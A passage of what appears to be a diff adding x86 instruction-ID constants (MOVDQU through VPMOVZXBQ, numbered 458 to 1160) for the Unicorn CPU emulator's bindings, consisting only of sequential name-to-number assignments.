+UC_X86_INS_MOVDQU = 458 +UC_X86_INS_MOVHLPS = 459 +UC_X86_INS_MOVHPD = 460 +UC_X86_INS_MOVHPS = 461 +UC_X86_INS_MOVLHPS = 462 +UC_X86_INS_MOVLPD = 463 +UC_X86_INS_MOVLPS = 464 +UC_X86_INS_MOVMSKPD = 465 +UC_X86_INS_MOVMSKPS = 466 +UC_X86_INS_MOVNTDQA = 467 +UC_X86_INS_MOVNTDQ = 468 +UC_X86_INS_MOVNTI = 469 +UC_X86_INS_MOVNTPD = 470 +UC_X86_INS_MOVNTPS = 471 +UC_X86_INS_MOVNTSD = 472 +UC_X86_INS_MOVNTSS = 473 +UC_X86_INS_MOVSB = 474 +UC_X86_INS_MOVSD = 475 +UC_X86_INS_MOVSHDUP = 476 +UC_X86_INS_MOVSLDUP = 477 +UC_X86_INS_MOVSQ = 478 +UC_X86_INS_MOVSS = 479 +UC_X86_INS_MOVSW = 480 +UC_X86_INS_MOVSX = 481 +UC_X86_INS_MOVSXD = 482 +UC_X86_INS_MOVUPD = 483 +UC_X86_INS_MOVUPS = 484 +UC_X86_INS_MOVZX = 485 +UC_X86_INS_MPSADBW = 486 +UC_X86_INS_MUL = 487 +UC_X86_INS_MULPD = 488 +UC_X86_INS_MULPS = 489 +UC_X86_INS_MULSD = 490 +UC_X86_INS_MULSS = 491 +UC_X86_INS_MULX = 492 +UC_X86_INS_FMUL = 493 +UC_X86_INS_FIMUL = 494 +UC_X86_INS_FMULP = 495 +UC_X86_INS_MWAIT = 496 +UC_X86_INS_NEG = 497 +UC_X86_INS_NOP = 498 +UC_X86_INS_NOT = 499 +UC_X86_INS_OUT = 500 +UC_X86_INS_OUTSB = 501 +UC_X86_INS_OUTSD = 502 +UC_X86_INS_OUTSW = 503 +UC_X86_INS_PACKUSDW = 504 +UC_X86_INS_PAUSE = 505 +UC_X86_INS_PAVGUSB = 506 +UC_X86_INS_PBLENDVB = 507 +UC_X86_INS_PBLENDW = 508 +UC_X86_INS_PCLMULQDQ = 509 +UC_X86_INS_PCMPEQQ = 510 +UC_X86_INS_PCMPESTRI = 511 +UC_X86_INS_PCMPESTRM = 512 +UC_X86_INS_PCMPGTQ = 513 +UC_X86_INS_PCMPISTRI = 514 +UC_X86_INS_PCMPISTRM = 515 +UC_X86_INS_PCOMMIT = 516 +UC_X86_INS_PDEP = 517 +UC_X86_INS_PEXT = 518 +UC_X86_INS_PEXTRB = 519 +UC_X86_INS_PEXTRD = 520 +UC_X86_INS_PEXTRQ = 521 +UC_X86_INS_PF2ID = 522 +UC_X86_INS_PF2IW = 523 +UC_X86_INS_PFACC = 524 +UC_X86_INS_PFADD = 525 +UC_X86_INS_PFCMPEQ = 526 +UC_X86_INS_PFCMPGE = 527 +UC_X86_INS_PFCMPGT = 528 +UC_X86_INS_PFMAX = 529 +UC_X86_INS_PFMIN = 530 +UC_X86_INS_PFMUL = 531 +UC_X86_INS_PFNACC = 532 +UC_X86_INS_PFPNACC = 533 +UC_X86_INS_PFRCPIT1 = 534 +UC_X86_INS_PFRCPIT2 = 535 +UC_X86_INS_PFRCP = 536 +UC_X86_INS_PFRSQIT1 = 537 +UC_X86_INS_PFRSQRT = 538 +UC_X86_INS_PFSUBR = 539 +UC_X86_INS_PFSUB = 540 +UC_X86_INS_PHMINPOSUW = 541 +UC_X86_INS_PI2FD = 542 +UC_X86_INS_PI2FW = 543 +UC_X86_INS_PINSRB = 544 +UC_X86_INS_PINSRD = 545 +UC_X86_INS_PINSRQ = 546 +UC_X86_INS_PMAXSB = 547 +UC_X86_INS_PMAXSD = 548 +UC_X86_INS_PMAXUD = 549 +UC_X86_INS_PMAXUW = 550 +UC_X86_INS_PMINSB = 551 +UC_X86_INS_PMINSD = 552 +UC_X86_INS_PMINUD = 553 +UC_X86_INS_PMINUW = 554 +UC_X86_INS_PMOVSXBD = 555 +UC_X86_INS_PMOVSXBQ = 556 +UC_X86_INS_PMOVSXBW = 557 +UC_X86_INS_PMOVSXDQ = 558 +UC_X86_INS_PMOVSXWD = 559 +UC_X86_INS_PMOVSXWQ = 560 +UC_X86_INS_PMOVZXBD = 561 +UC_X86_INS_PMOVZXBQ = 562 +UC_X86_INS_PMOVZXBW = 563 +UC_X86_INS_PMOVZXDQ = 564 +UC_X86_INS_PMOVZXWD = 565 +UC_X86_INS_PMOVZXWQ = 566 +UC_X86_INS_PMULDQ = 567 +UC_X86_INS_PMULHRW = 568 +UC_X86_INS_PMULLD = 569 +UC_X86_INS_POP = 570 +UC_X86_INS_POPAW = 571 +UC_X86_INS_POPAL = 572 +UC_X86_INS_POPCNT = 573 +UC_X86_INS_POPF = 574 +UC_X86_INS_POPFD = 575 +UC_X86_INS_POPFQ = 576 +UC_X86_INS_PREFETCH = 577 +UC_X86_INS_PREFETCHNTA = 578 +UC_X86_INS_PREFETCHT0 = 579 +UC_X86_INS_PREFETCHT1 = 580 +UC_X86_INS_PREFETCHT2 = 581 +UC_X86_INS_PREFETCHW = 582 +UC_X86_INS_PSHUFD = 583 +UC_X86_INS_PSHUFHW = 584 +UC_X86_INS_PSHUFLW = 585 +UC_X86_INS_PSLLDQ = 586 +UC_X86_INS_PSRLDQ = 587 +UC_X86_INS_PSWAPD = 588 +UC_X86_INS_PTEST = 589 +UC_X86_INS_PUNPCKHQDQ = 590 +UC_X86_INS_PUNPCKLQDQ = 591 +UC_X86_INS_PUSH = 592 +UC_X86_INS_PUSHAW = 593 +UC_X86_INS_PUSHAL = 594 +UC_X86_INS_PUSHF = 595 +UC_X86_INS_PUSHFD = 596 +UC_X86_INS_PUSHFQ = 597 +UC_X86_INS_RCL = 598 +UC_X86_INS_RCPPS = 599 +UC_X86_INS_RCPSS = 600 +UC_X86_INS_RCR = 601 +UC_X86_INS_RDFSBASE = 602 +UC_X86_INS_RDGSBASE = 603 +UC_X86_INS_RDMSR = 604 +UC_X86_INS_RDPMC = 605 +UC_X86_INS_RDRAND = 606 +UC_X86_INS_RDSEED = 607 +UC_X86_INS_RDTSC = 608 +UC_X86_INS_RDTSCP = 609 +UC_X86_INS_ROL = 610 +UC_X86_INS_ROR = 611 +UC_X86_INS_RORX = 612 +UC_X86_INS_ROUNDPD = 613 +UC_X86_INS_ROUNDPS = 614 +UC_X86_INS_ROUNDSD = 615 +UC_X86_INS_ROUNDSS = 616 +UC_X86_INS_RSM = 617 +UC_X86_INS_RSQRTPS = 618 +UC_X86_INS_RSQRTSS = 619 +UC_X86_INS_SAHF = 620 +UC_X86_INS_SAL = 621 +UC_X86_INS_SALC = 622 +UC_X86_INS_SAR = 623 +UC_X86_INS_SARX = 624 +UC_X86_INS_SBB = 625 +UC_X86_INS_SCASB = 626 +UC_X86_INS_SCASD = 627 +UC_X86_INS_SCASQ = 628 +UC_X86_INS_SCASW = 629 +UC_X86_INS_SETAE = 630 +UC_X86_INS_SETA = 631 +UC_X86_INS_SETBE = 632 +UC_X86_INS_SETB = 633 +UC_X86_INS_SETE = 634 +UC_X86_INS_SETGE = 635 +UC_X86_INS_SETG = 636 +UC_X86_INS_SETLE = 637 +UC_X86_INS_SETL = 638 +UC_X86_INS_SETNE = 639 +UC_X86_INS_SETNO = 640 +UC_X86_INS_SETNP = 641 +UC_X86_INS_SETNS = 642 +UC_X86_INS_SETO = 643 +UC_X86_INS_SETP = 644 +UC_X86_INS_SETS = 645 +UC_X86_INS_SFENCE = 646 +UC_X86_INS_SGDT = 647 +UC_X86_INS_SHA1MSG1 = 648 +UC_X86_INS_SHA1MSG2 = 649 +UC_X86_INS_SHA1NEXTE = 650 +UC_X86_INS_SHA1RNDS4 = 651 +UC_X86_INS_SHA256MSG1 = 652 +UC_X86_INS_SHA256MSG2 = 653 +UC_X86_INS_SHA256RNDS2 = 654 +UC_X86_INS_SHL = 655 +UC_X86_INS_SHLD = 656 +UC_X86_INS_SHLX = 657 +UC_X86_INS_SHR = 658 +UC_X86_INS_SHRD = 659 +UC_X86_INS_SHRX = 660 +UC_X86_INS_SHUFPD = 661 +UC_X86_INS_SHUFPS = 662 +UC_X86_INS_SIDT = 663 +UC_X86_INS_FSIN = 664 +UC_X86_INS_SKINIT = 665 +UC_X86_INS_SLDT = 666 +UC_X86_INS_SMSW = 667 +UC_X86_INS_SQRTPD = 668 +UC_X86_INS_SQRTPS = 669 +UC_X86_INS_SQRTSD = 670 +UC_X86_INS_SQRTSS = 671 +UC_X86_INS_FSQRT = 672 +UC_X86_INS_STAC = 673 +UC_X86_INS_STC = 674 +UC_X86_INS_STD = 675 +UC_X86_INS_STGI = 676 +UC_X86_INS_STI = 677 +UC_X86_INS_STMXCSR = 678 +UC_X86_INS_STOSB = 679 +UC_X86_INS_STOSD = 680 +UC_X86_INS_STOSQ = 681 +UC_X86_INS_STOSW = 682 +UC_X86_INS_STR = 683 +UC_X86_INS_FST = 684 +UC_X86_INS_FSTP = 685 +UC_X86_INS_FSTPNCE = 686 +UC_X86_INS_FXCH = 687 +UC_X86_INS_SUBPD = 688 +UC_X86_INS_SUBPS = 689 +UC_X86_INS_FSUBR = 690 +UC_X86_INS_FISUBR = 691 +UC_X86_INS_FSUBRP = 692 +UC_X86_INS_SUBSD = 693 +UC_X86_INS_SUBSS = 694 +UC_X86_INS_FSUB = 695 +UC_X86_INS_FISUB = 696 +UC_X86_INS_FSUBP = 697 +UC_X86_INS_SWAPGS = 698 +UC_X86_INS_SYSCALL = 699 +UC_X86_INS_SYSENTER = 700 +UC_X86_INS_SYSEXIT = 701 +UC_X86_INS_SYSRET = 702 +UC_X86_INS_T1MSKC = 703 +UC_X86_INS_TEST = 704 +UC_X86_INS_UD2 = 705 +UC_X86_INS_FTST = 706 +UC_X86_INS_TZCNT = 707 +UC_X86_INS_TZMSK = 708 +UC_X86_INS_FUCOMPI = 709 +UC_X86_INS_FUCOMI = 710 +UC_X86_INS_FUCOMPP = 711 +UC_X86_INS_FUCOMP = 712 +UC_X86_INS_FUCOM = 713 +UC_X86_INS_UD2B = 714 +UC_X86_INS_UNPCKHPD = 715 +UC_X86_INS_UNPCKHPS = 716 +UC_X86_INS_UNPCKLPD = 717 +UC_X86_INS_UNPCKLPS = 718 +UC_X86_INS_VADDPD = 719 +UC_X86_INS_VADDPS = 720 +UC_X86_INS_VADDSD = 721 +UC_X86_INS_VADDSS = 722 +UC_X86_INS_VADDSUBPD = 723 +UC_X86_INS_VADDSUBPS = 724 +UC_X86_INS_VAESDECLAST = 725 +UC_X86_INS_VAESDEC = 726 +UC_X86_INS_VAESENCLAST = 727 +UC_X86_INS_VAESENC = 728 +UC_X86_INS_VAESIMC = 729 +UC_X86_INS_VAESKEYGENASSIST = 730 +UC_X86_INS_VALIGND = 731 +UC_X86_INS_VALIGNQ = 732 +UC_X86_INS_VANDNPD = 733 +UC_X86_INS_VANDNPS = 734 +UC_X86_INS_VANDPD = 735 +UC_X86_INS_VANDPS = 736 +UC_X86_INS_VBLENDMPD = 737 +UC_X86_INS_VBLENDMPS = 738 +UC_X86_INS_VBLENDPD = 739 +UC_X86_INS_VBLENDPS = 740 +UC_X86_INS_VBLENDVPD = 741 +UC_X86_INS_VBLENDVPS = 742 +UC_X86_INS_VBROADCASTF128 = 743 +UC_X86_INS_VBROADCASTI32X4 = 744 +UC_X86_INS_VBROADCASTI64X4 = 745 +UC_X86_INS_VBROADCASTSD = 746 +UC_X86_INS_VBROADCASTSS = 747 +UC_X86_INS_VCMPPD = 748 +UC_X86_INS_VCMPPS = 749 +UC_X86_INS_VCMPSD = 750 +UC_X86_INS_VCMPSS = 751 +UC_X86_INS_VCOMPRESSPD = 752 +UC_X86_INS_VCOMPRESSPS = 753 +UC_X86_INS_VCVTDQ2PD = 754 +UC_X86_INS_VCVTDQ2PS = 755 +UC_X86_INS_VCVTPD2DQX = 756 +UC_X86_INS_VCVTPD2DQ = 757 +UC_X86_INS_VCVTPD2PSX = 758 +UC_X86_INS_VCVTPD2PS = 759 +UC_X86_INS_VCVTPD2UDQ = 760 +UC_X86_INS_VCVTPH2PS = 761 +UC_X86_INS_VCVTPS2DQ = 762 +UC_X86_INS_VCVTPS2PD = 763 +UC_X86_INS_VCVTPS2PH = 764 +UC_X86_INS_VCVTPS2UDQ = 765 +UC_X86_INS_VCVTSD2SI = 766 +UC_X86_INS_VCVTSD2USI = 767 +UC_X86_INS_VCVTSS2SI = 768 +UC_X86_INS_VCVTSS2USI = 769 +UC_X86_INS_VCVTTPD2DQX = 770 +UC_X86_INS_VCVTTPD2DQ = 771 +UC_X86_INS_VCVTTPD2UDQ = 772 +UC_X86_INS_VCVTTPS2DQ = 773 +UC_X86_INS_VCVTTPS2UDQ = 774 +UC_X86_INS_VCVTUDQ2PD = 775 +UC_X86_INS_VCVTUDQ2PS = 776 +UC_X86_INS_VDIVPD = 777 +UC_X86_INS_VDIVPS = 778 +UC_X86_INS_VDIVSD = 779 +UC_X86_INS_VDIVSS = 780 +UC_X86_INS_VDPPD = 781 +UC_X86_INS_VDPPS = 782 +UC_X86_INS_VERR = 783 +UC_X86_INS_VERW = 784 +UC_X86_INS_VEXP2PD = 785 +UC_X86_INS_VEXP2PS = 786 +UC_X86_INS_VEXPANDPD = 787 +UC_X86_INS_VEXPANDPS = 788 +UC_X86_INS_VEXTRACTF128 = 789 +UC_X86_INS_VEXTRACTF32X4 = 790 +UC_X86_INS_VEXTRACTF64X4 = 791 +UC_X86_INS_VEXTRACTI128 = 792 +UC_X86_INS_VEXTRACTI32X4 = 793 +UC_X86_INS_VEXTRACTI64X4 = 794 +UC_X86_INS_VEXTRACTPS = 795 +UC_X86_INS_VFMADD132PD = 796 +UC_X86_INS_VFMADD132PS = 797 +UC_X86_INS_VFMADDPD = 798 +UC_X86_INS_VFMADD213PD = 799 +UC_X86_INS_VFMADD231PD = 800 +UC_X86_INS_VFMADDPS = 801 +UC_X86_INS_VFMADD213PS = 802 +UC_X86_INS_VFMADD231PS = 803 +UC_X86_INS_VFMADDSD = 804 +UC_X86_INS_VFMADD213SD = 805 +UC_X86_INS_VFMADD132SD = 806 +UC_X86_INS_VFMADD231SD = 807 +UC_X86_INS_VFMADDSS = 808 +UC_X86_INS_VFMADD213SS = 809 +UC_X86_INS_VFMADD132SS = 810 +UC_X86_INS_VFMADD231SS = 811 +UC_X86_INS_VFMADDSUB132PD = 812 +UC_X86_INS_VFMADDSUB132PS = 813 +UC_X86_INS_VFMADDSUBPD = 814 +UC_X86_INS_VFMADDSUB213PD = 815 +UC_X86_INS_VFMADDSUB231PD = 816 +UC_X86_INS_VFMADDSUBPS = 817 +UC_X86_INS_VFMADDSUB213PS = 818 +UC_X86_INS_VFMADDSUB231PS = 819 +UC_X86_INS_VFMSUB132PD = 820 +UC_X86_INS_VFMSUB132PS = 821 +UC_X86_INS_VFMSUBADD132PD = 822 +UC_X86_INS_VFMSUBADD132PS = 823 +UC_X86_INS_VFMSUBADDPD = 824 +UC_X86_INS_VFMSUBADD213PD = 825 +UC_X86_INS_VFMSUBADD231PD = 826 +UC_X86_INS_VFMSUBADDPS = 827 +UC_X86_INS_VFMSUBADD213PS = 828 +UC_X86_INS_VFMSUBADD231PS = 829 +UC_X86_INS_VFMSUBPD = 830 +UC_X86_INS_VFMSUB213PD = 831 +UC_X86_INS_VFMSUB231PD = 832 +UC_X86_INS_VFMSUBPS = 833 +UC_X86_INS_VFMSUB213PS = 834 +UC_X86_INS_VFMSUB231PS = 835 +UC_X86_INS_VFMSUBSD = 836 +UC_X86_INS_VFMSUB213SD = 837 +UC_X86_INS_VFMSUB132SD = 838 +UC_X86_INS_VFMSUB231SD = 839 +UC_X86_INS_VFMSUBSS = 840 +UC_X86_INS_VFMSUB213SS = 841 +UC_X86_INS_VFMSUB132SS = 842 +UC_X86_INS_VFMSUB231SS = 843 +UC_X86_INS_VFNMADD132PD = 844 +UC_X86_INS_VFNMADD132PS = 845 +UC_X86_INS_VFNMADDPD = 846 +UC_X86_INS_VFNMADD213PD = 847 +UC_X86_INS_VFNMADD231PD = 848 +UC_X86_INS_VFNMADDPS = 849 +UC_X86_INS_VFNMADD213PS = 850 +UC_X86_INS_VFNMADD231PS = 851 +UC_X86_INS_VFNMADDSD = 852 +UC_X86_INS_VFNMADD213SD = 853 +UC_X86_INS_VFNMADD132SD = 854 +UC_X86_INS_VFNMADD231SD = 855 +UC_X86_INS_VFNMADDSS = 856 +UC_X86_INS_VFNMADD213SS = 857 +UC_X86_INS_VFNMADD132SS = 858 +UC_X86_INS_VFNMADD231SS = 859 +UC_X86_INS_VFNMSUB132PD = 860 +UC_X86_INS_VFNMSUB132PS = 861 +UC_X86_INS_VFNMSUBPD = 862 +UC_X86_INS_VFNMSUB213PD = 863 +UC_X86_INS_VFNMSUB231PD = 864 +UC_X86_INS_VFNMSUBPS = 865 +UC_X86_INS_VFNMSUB213PS = 866 +UC_X86_INS_VFNMSUB231PS = 867 +UC_X86_INS_VFNMSUBSD = 868 +UC_X86_INS_VFNMSUB213SD = 869 +UC_X86_INS_VFNMSUB132SD = 870 +UC_X86_INS_VFNMSUB231SD = 871 +UC_X86_INS_VFNMSUBSS = 872 +UC_X86_INS_VFNMSUB213SS = 873 +UC_X86_INS_VFNMSUB132SS = 874 +UC_X86_INS_VFNMSUB231SS = 875 +UC_X86_INS_VFRCZPD = 876 +UC_X86_INS_VFRCZPS = 877 +UC_X86_INS_VFRCZSD = 878 +UC_X86_INS_VFRCZSS = 879 +UC_X86_INS_VORPD = 880 +UC_X86_INS_VORPS = 881 +UC_X86_INS_VXORPD = 882 +UC_X86_INS_VXORPS = 883 +UC_X86_INS_VGATHERDPD = 884 +UC_X86_INS_VGATHERDPS = 885 +UC_X86_INS_VGATHERPF0DPD = 886 +UC_X86_INS_VGATHERPF0DPS = 887 +UC_X86_INS_VGATHERPF0QPD = 888 +UC_X86_INS_VGATHERPF0QPS = 889 +UC_X86_INS_VGATHERPF1DPD = 890 +UC_X86_INS_VGATHERPF1DPS = 891 +UC_X86_INS_VGATHERPF1QPD = 892 +UC_X86_INS_VGATHERPF1QPS = 893 +UC_X86_INS_VGATHERQPD = 894 +UC_X86_INS_VGATHERQPS = 895 +UC_X86_INS_VHADDPD = 896 +UC_X86_INS_VHADDPS = 897 +UC_X86_INS_VHSUBPD = 898 +UC_X86_INS_VHSUBPS = 899 +UC_X86_INS_VINSERTF128 = 900 +UC_X86_INS_VINSERTF32X4 = 901 +UC_X86_INS_VINSERTF32X8 = 902 +UC_X86_INS_VINSERTF64X2 = 903 +UC_X86_INS_VINSERTF64X4 = 904 +UC_X86_INS_VINSERTI128 = 905 +UC_X86_INS_VINSERTI32X4 = 906 +UC_X86_INS_VINSERTI32X8 = 907 +UC_X86_INS_VINSERTI64X2 = 908 +UC_X86_INS_VINSERTI64X4 = 909 +UC_X86_INS_VINSERTPS = 910 +UC_X86_INS_VLDDQU = 911 +UC_X86_INS_VLDMXCSR = 912 +UC_X86_INS_VMASKMOVDQU = 913 +UC_X86_INS_VMASKMOVPD = 914 +UC_X86_INS_VMASKMOVPS = 915 +UC_X86_INS_VMAXPD = 916 +UC_X86_INS_VMAXPS = 917 +UC_X86_INS_VMAXSD = 918 +UC_X86_INS_VMAXSS = 919 +UC_X86_INS_VMCALL = 920 +UC_X86_INS_VMCLEAR = 921 +UC_X86_INS_VMFUNC = 922 +UC_X86_INS_VMINPD = 923 +UC_X86_INS_VMINPS = 924 +UC_X86_INS_VMINSD = 925 +UC_X86_INS_VMINSS = 926 +UC_X86_INS_VMLAUNCH = 927 +UC_X86_INS_VMLOAD = 928 +UC_X86_INS_VMMCALL = 929 +UC_X86_INS_VMOVQ = 930 +UC_X86_INS_VMOVDDUP = 931 +UC_X86_INS_VMOVD = 932 +UC_X86_INS_VMOVDQA32 = 933 +UC_X86_INS_VMOVDQA64 = 934 +UC_X86_INS_VMOVDQA = 935 +UC_X86_INS_VMOVDQU16 = 936 +UC_X86_INS_VMOVDQU32 = 937 +UC_X86_INS_VMOVDQU64 = 938 +UC_X86_INS_VMOVDQU8 = 939 +UC_X86_INS_VMOVDQU = 940 +UC_X86_INS_VMOVHLPS = 941 +UC_X86_INS_VMOVHPD = 942 +UC_X86_INS_VMOVHPS = 943 +UC_X86_INS_VMOVLHPS = 944 +UC_X86_INS_VMOVLPD = 945 +UC_X86_INS_VMOVLPS = 946 +UC_X86_INS_VMOVMSKPD = 947 +UC_X86_INS_VMOVMSKPS = 948 +UC_X86_INS_VMOVNTDQA = 949 +UC_X86_INS_VMOVNTDQ = 950 +UC_X86_INS_VMOVNTPD = 951 +UC_X86_INS_VMOVNTPS = 952 +UC_X86_INS_VMOVSD = 953 +UC_X86_INS_VMOVSHDUP = 954 +UC_X86_INS_VMOVSLDUP = 955 +UC_X86_INS_VMOVSS = 956 +UC_X86_INS_VMOVUPD = 957 +UC_X86_INS_VMOVUPS = 958 +UC_X86_INS_VMPSADBW = 959 +UC_X86_INS_VMPTRLD = 960 +UC_X86_INS_VMPTRST = 961 +UC_X86_INS_VMREAD = 962 +UC_X86_INS_VMRESUME = 963 +UC_X86_INS_VMRUN = 964 +UC_X86_INS_VMSAVE = 965 +UC_X86_INS_VMULPD = 966 +UC_X86_INS_VMULPS = 967 +UC_X86_INS_VMULSD = 968 +UC_X86_INS_VMULSS = 969 +UC_X86_INS_VMWRITE = 970 +UC_X86_INS_VMXOFF = 971 +UC_X86_INS_VMXON = 972 +UC_X86_INS_VPABSB = 973 +UC_X86_INS_VPABSD = 974 +UC_X86_INS_VPABSQ = 975 +UC_X86_INS_VPABSW = 976 +UC_X86_INS_VPACKSSDW = 977 +UC_X86_INS_VPACKSSWB = 978 +UC_X86_INS_VPACKUSDW = 979 +UC_X86_INS_VPACKUSWB = 980 +UC_X86_INS_VPADDB = 981 +UC_X86_INS_VPADDD = 982 +UC_X86_INS_VPADDQ = 983 +UC_X86_INS_VPADDSB = 984 +UC_X86_INS_VPADDSW = 985 +UC_X86_INS_VPADDUSB = 986 +UC_X86_INS_VPADDUSW = 987 +UC_X86_INS_VPADDW = 988 +UC_X86_INS_VPALIGNR = 989 +UC_X86_INS_VPANDD = 990 +UC_X86_INS_VPANDND = 991 +UC_X86_INS_VPANDNQ = 992 +UC_X86_INS_VPANDN = 993 +UC_X86_INS_VPANDQ = 994 +UC_X86_INS_VPAND = 995 +UC_X86_INS_VPAVGB = 996 +UC_X86_INS_VPAVGW = 997 +UC_X86_INS_VPBLENDD = 998 +UC_X86_INS_VPBLENDMB = 999 +UC_X86_INS_VPBLENDMD = 1000 +UC_X86_INS_VPBLENDMQ = 1001 +UC_X86_INS_VPBLENDMW = 1002 +UC_X86_INS_VPBLENDVB = 1003 +UC_X86_INS_VPBLENDW = 1004 +UC_X86_INS_VPBROADCASTB = 1005 +UC_X86_INS_VPBROADCASTD = 1006 +UC_X86_INS_VPBROADCASTMB2Q = 1007 +UC_X86_INS_VPBROADCASTMW2D = 1008 +UC_X86_INS_VPBROADCASTQ = 1009 +UC_X86_INS_VPBROADCASTW = 1010 +UC_X86_INS_VPCLMULQDQ = 1011 +UC_X86_INS_VPCMOV = 1012 +UC_X86_INS_VPCMPB = 1013 +UC_X86_INS_VPCMPD = 1014 +UC_X86_INS_VPCMPEQB = 1015 +UC_X86_INS_VPCMPEQD = 1016 +UC_X86_INS_VPCMPEQQ = 1017 +UC_X86_INS_VPCMPEQW = 1018 +UC_X86_INS_VPCMPESTRI = 1019 +UC_X86_INS_VPCMPESTRM = 1020 +UC_X86_INS_VPCMPGTB = 1021 +UC_X86_INS_VPCMPGTD = 1022 +UC_X86_INS_VPCMPGTQ = 1023 +UC_X86_INS_VPCMPGTW = 1024 +UC_X86_INS_VPCMPISTRI = 1025 +UC_X86_INS_VPCMPISTRM = 1026 +UC_X86_INS_VPCMPQ = 1027 +UC_X86_INS_VPCMPUB = 1028 +UC_X86_INS_VPCMPUD = 1029 +UC_X86_INS_VPCMPUQ = 1030 +UC_X86_INS_VPCMPUW = 1031 +UC_X86_INS_VPCMPW = 1032 +UC_X86_INS_VPCOMB = 1033 +UC_X86_INS_VPCOMD = 1034 +UC_X86_INS_VPCOMPRESSD = 1035 +UC_X86_INS_VPCOMPRESSQ = 1036 +UC_X86_INS_VPCOMQ = 1037 +UC_X86_INS_VPCOMUB = 1038 +UC_X86_INS_VPCOMUD = 1039 +UC_X86_INS_VPCOMUQ = 1040 +UC_X86_INS_VPCOMUW = 1041 +UC_X86_INS_VPCOMW = 1042 +UC_X86_INS_VPCONFLICTD = 1043 +UC_X86_INS_VPCONFLICTQ = 1044 +UC_X86_INS_VPERM2F128 = 1045 +UC_X86_INS_VPERM2I128 = 1046 +UC_X86_INS_VPERMD = 1047 +UC_X86_INS_VPERMI2D = 1048 +UC_X86_INS_VPERMI2PD = 1049 +UC_X86_INS_VPERMI2PS = 1050 +UC_X86_INS_VPERMI2Q = 1051 +UC_X86_INS_VPERMIL2PD = 1052 +UC_X86_INS_VPERMIL2PS = 1053 +UC_X86_INS_VPERMILPD = 1054 +UC_X86_INS_VPERMILPS = 1055 +UC_X86_INS_VPERMPD = 1056 +UC_X86_INS_VPERMPS = 1057 +UC_X86_INS_VPERMQ = 1058 +UC_X86_INS_VPERMT2D = 1059 +UC_X86_INS_VPERMT2PD = 1060 +UC_X86_INS_VPERMT2PS = 1061 +UC_X86_INS_VPERMT2Q = 1062 +UC_X86_INS_VPEXPANDD = 1063 +UC_X86_INS_VPEXPANDQ = 1064 +UC_X86_INS_VPEXTRB = 1065 +UC_X86_INS_VPEXTRD = 1066 +UC_X86_INS_VPEXTRQ = 1067 +UC_X86_INS_VPEXTRW = 1068 +UC_X86_INS_VPGATHERDD = 1069 +UC_X86_INS_VPGATHERDQ = 1070 +UC_X86_INS_VPGATHERQD = 1071 +UC_X86_INS_VPGATHERQQ = 1072 +UC_X86_INS_VPHADDBD = 1073 +UC_X86_INS_VPHADDBQ = 1074 +UC_X86_INS_VPHADDBW = 1075 +UC_X86_INS_VPHADDDQ = 1076 +UC_X86_INS_VPHADDD = 1077 +UC_X86_INS_VPHADDSW = 1078 +UC_X86_INS_VPHADDUBD = 1079 +UC_X86_INS_VPHADDUBQ = 1080 +UC_X86_INS_VPHADDUBW = 1081 +UC_X86_INS_VPHADDUDQ = 1082 +UC_X86_INS_VPHADDUWD = 1083 +UC_X86_INS_VPHADDUWQ = 1084 +UC_X86_INS_VPHADDWD = 1085 +UC_X86_INS_VPHADDWQ = 1086 +UC_X86_INS_VPHADDW = 1087 +UC_X86_INS_VPHMINPOSUW = 1088 +UC_X86_INS_VPHSUBBW = 1089 +UC_X86_INS_VPHSUBDQ = 1090 +UC_X86_INS_VPHSUBD = 1091 +UC_X86_INS_VPHSUBSW = 1092 +UC_X86_INS_VPHSUBWD = 1093 +UC_X86_INS_VPHSUBW = 1094 +UC_X86_INS_VPINSRB = 1095 +UC_X86_INS_VPINSRD = 1096 +UC_X86_INS_VPINSRQ = 1097 +UC_X86_INS_VPINSRW = 1098 +UC_X86_INS_VPLZCNTD = 1099 +UC_X86_INS_VPLZCNTQ = 1100 +UC_X86_INS_VPMACSDD = 1101 +UC_X86_INS_VPMACSDQH = 1102 +UC_X86_INS_VPMACSDQL = 1103 +UC_X86_INS_VPMACSSDD = 1104 +UC_X86_INS_VPMACSSDQH = 1105 +UC_X86_INS_VPMACSSDQL = 1106 +UC_X86_INS_VPMACSSWD = 1107 +UC_X86_INS_VPMACSSWW = 1108 +UC_X86_INS_VPMACSWD = 1109 +UC_X86_INS_VPMACSWW = 1110 +UC_X86_INS_VPMADCSSWD = 1111 +UC_X86_INS_VPMADCSWD = 1112 +UC_X86_INS_VPMADDUBSW = 1113 +UC_X86_INS_VPMADDWD = 1114 +UC_X86_INS_VPMASKMOVD = 1115 +UC_X86_INS_VPMASKMOVQ = 1116 +UC_X86_INS_VPMAXSB = 1117 +UC_X86_INS_VPMAXSD = 1118 +UC_X86_INS_VPMAXSQ = 1119 +UC_X86_INS_VPMAXSW = 1120 +UC_X86_INS_VPMAXUB = 1121 +UC_X86_INS_VPMAXUD = 1122 +UC_X86_INS_VPMAXUQ = 1123 +UC_X86_INS_VPMAXUW = 1124 +UC_X86_INS_VPMINSB = 1125 +UC_X86_INS_VPMINSD = 1126 +UC_X86_INS_VPMINSQ = 1127 +UC_X86_INS_VPMINSW = 1128 +UC_X86_INS_VPMINUB = 1129 +UC_X86_INS_VPMINUD = 1130 +UC_X86_INS_VPMINUQ = 1131 +UC_X86_INS_VPMINUW = 1132 +UC_X86_INS_VPMOVDB = 1133 +UC_X86_INS_VPMOVDW = 1134 +UC_X86_INS_VPMOVM2B = 1135 +UC_X86_INS_VPMOVM2D = 1136 +UC_X86_INS_VPMOVM2Q = 1137 +UC_X86_INS_VPMOVM2W = 1138 +UC_X86_INS_VPMOVMSKB = 1139 +UC_X86_INS_VPMOVQB = 1140 +UC_X86_INS_VPMOVQD = 1141 +UC_X86_INS_VPMOVQW = 1142 +UC_X86_INS_VPMOVSDB = 1143 +UC_X86_INS_VPMOVSDW = 1144 +UC_X86_INS_VPMOVSQB = 1145 +UC_X86_INS_VPMOVSQD = 1146 +UC_X86_INS_VPMOVSQW = 1147 +UC_X86_INS_VPMOVSXBD = 1148 +UC_X86_INS_VPMOVSXBQ = 1149 +UC_X86_INS_VPMOVSXBW = 1150 +UC_X86_INS_VPMOVSXDQ = 1151 +UC_X86_INS_VPMOVSXWD = 1152 +UC_X86_INS_VPMOVSXWQ = 1153 +UC_X86_INS_VPMOVUSDB = 1154 +UC_X86_INS_VPMOVUSDW = 1155 +UC_X86_INS_VPMOVUSQB = 1156 +UC_X86_INS_VPMOVUSQD = 1157 +UC_X86_INS_VPMOVUSQW = 1158 +UC_X86_INS_VPMOVZXBD = 1159 +UC_X86_INS_VPMOVZXBQ = 1160 